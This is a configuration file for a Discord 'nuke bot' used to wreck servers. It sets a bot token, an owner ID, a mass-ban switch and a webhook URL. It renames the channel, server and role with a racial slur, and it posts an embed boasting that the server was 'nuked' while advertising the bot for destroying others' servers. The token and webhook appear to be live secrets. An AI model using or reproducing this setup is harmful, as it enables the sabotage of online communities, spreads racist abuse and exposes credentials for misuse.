BOT_TOKEN="MTM2MTA4MzU2OTY2MTAxODQwNA.GxdKhF.BTY4VZpeCYFhR0hdEHqPguHdhTecuWB4ZlyiJQ"
BOT_OWNER_ID="461052927163760641"

MASS_BAN=false

WEBHOOK_URL="https://discord.com/api/webhooks/1326603428163489864/Fg1NaW4LdUY_duGY39TlenIyg1-5JPRh1Izy-oC9ntMtWlwPWgJ4zS8ODB1pQ0lBvuXr"
AVATAR_URL="https://i.imgur.com/cOmcxRt.jpeg"

PREFERRED_LOCALE="el"

CHANNEL_NAME=">>NIGGER<<"
SERVER_NAME="<<NIGGER>>"
ROLE_NAME="NIGGER"


EMBED_TITLE="Your server has been nuked by otolot"
EMBED_DESCRIPTION="```Maszyna Tomata is one of the most powerful discord nuke bot. Unfortunately this server has been nuked due to admins' inattention.```\n\n### If you're interested in this bot or you need to destroy somebody's server you can join our discord server.\n\n\n**Blood Group has:**\n\n* `Powerful bots with uptime 24/7`\n* `Good community`\n"
